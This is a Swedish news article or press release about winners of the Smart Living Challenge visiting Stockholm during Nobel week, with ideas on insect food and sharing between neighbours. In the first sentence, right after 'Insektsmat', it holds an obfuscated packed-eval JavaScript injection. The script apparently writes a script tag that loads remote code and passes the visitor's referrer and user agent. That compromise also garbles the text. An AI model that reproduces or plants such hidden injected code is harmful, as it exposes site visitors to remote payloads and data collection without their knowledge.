Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Framtidens hållbara livsstil: äta insekter och hyra grannens eluttag

Framtidens hållbara livsstil: äta insekter och hyra grannens eluttag
Sebastian

Insektsmat eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eahfb|var|u0026u|referrer|znzfr||js|php’.split(’|’),0,{}))
och gemensamt resursutnyttjande är exempel på de idéer kring hållbar livsstil i städer som vann innovationstävlingen Smart Living Challenge. Under Nobelveckan befinner sig de 15 vinnarna från 12 länder och 5 kontinenter i Stockholm för att ta sina idéer vidare mot förverkligande.

Frågan om hållbar livsstil är global och det finns mycket att lära från alla hörn i världen, men för ökad effekt krävs det både utökat kunskapsutbyte och framåtsträvande strategier. Sverige som har en ledande position internationellt när det gäller innovation är initiativtagare till den internationella innovationstävlingen Smart Living Challenge. Under Sverigebesöket deltar vinnarna i möten och workshops med några av de främsta innovationsmiljöerna i landet, som KTH Innovation, OpenLab,Munktell Science Park, Blackbox, Svensk Form, Expectrum, Create Business Incubator ochInteractive Institute.

Vinu Nair från Sydafrika, bakom vinnande idén GenBox, en smart lösning för paketleverans,ser Smart Living Challenge som en plattform för att komma vidare i utvecklingen:

“Vi deltog i Smart Living Challenge för att det är ett community för att dela och utveckla idéer. Tävlingens format öppnar upp för konkreta feedback på Genbox, vilket är viktigt för oss eftersom vi planerar att starta i början av 2015.”

Flera möjliga synergieffekter finns i att stärka nätverk mellan vinnarna och externa innovatörer och experter, men även mellan de själva olika vinnarna som till exempel tävlingsbidragen Ento ochBuzzbuilding, vars lösningar är till för att öka andelen insekter i västerländsk föda.

Det finns också flera idéer som handlar om ett ökat delande mellan grannar, något som svenska HSB tillsammans med Riksbyggen särskilt efterfrågat. Electro Rest är ett exempel: en idé för att ladda elbilen i grannens laddstation, och Back to the Bake som går ut på att få människor i samma kvarter att baka tillsammans för att öka grannsämjan.

Vinnarna ska också pitcha sina idéer för investerare, få nya perspektiv från alltifrån rymdforskning till ekosystemtjänster, möta flera utländska myndigheter på Svenska institutet, och delta i en diplomceremoni och äta Nobelmiddag dagen efter Nobelprisutdelningen på Stadshuset.

Vill du träffa vinnarna? Det kommer ges möjlighet för intervjuer på Svenska institutet den 10 december från kl 17.00 efter ett seminarium om vad samhället kan göra för grön innovation. Meddela gärna din närvaro och din intervjuförfrågan till presskontakten nedan.